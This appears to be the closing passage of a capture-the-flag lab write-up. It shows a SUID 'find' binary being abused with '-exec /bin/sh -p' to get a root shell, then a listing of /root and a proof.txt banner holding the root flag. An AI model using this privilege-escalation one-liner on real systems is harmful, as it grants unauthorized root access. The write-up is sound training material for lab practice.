/usr/bin/find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Nov 7 2020 .
drwxr-xr-x 20 root root 4.0K Nov 7 2020 ..
-rw------- 1 root root 162 Nov 7 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 14 2019 .bashrc
drwx------ 2 root root 4.0K Oct 22 2020 .cache
drwxr-xr-x 3 root root 4.0K Nov 7 2020 .local
-rw-r--r-- 1 root root 161 Sep 16 2020 .profile
-rw-r--r-- 1 root root 1.4K Nov 7 2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 3: cat: not found
# more proof.txt
more proof.txt
_ __
___ | ' \
___ \ / ___ ,'\_ | .-. \ /|
\ / | |,'__ \ ,'\_ | \ | | | | ,' |_ /|
_ | | | |\/ \ \ | \ | |\_| _ | |_| | _ '-. .-',' |_ _
// | | | |____| | | |\_|| |__ // | | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _ | | | | |\ \ // .| |\_/ | / \ || | | | / |\ \| \
`-. .-'| |/ / | | | | | | \ \// | | | | | || | | | | |_\ || |\_|
| | | || \_| | | | /_\ \ / | |` | | | || | | | | .---'| |
| | | |\___,_\ /_\ _ // | | | \_/ || | | | | | /\| |
/_\ | | //_____// .||` `._,' | | | | \ `-' /| |
/_\ `------' \ | AND `.\ | | `._,' /_\
\| THE `.\
_ _ _ _ __ _ __ _ /_
(_`/ \|_)/ '|_ |_)|_ |_)(_
._)\_/| \\_,|__| \|__| \ _)
_ ___ _ _
(_` | / \|\ ||__
._) | \_/| \||___
root{63a9f0ea7bb98050796b649e85481845!!}
#
Privilege escalation succeeded and the root flag was obtained.
STRIVE FOR PROGRESS, NOT FOR PERFECTION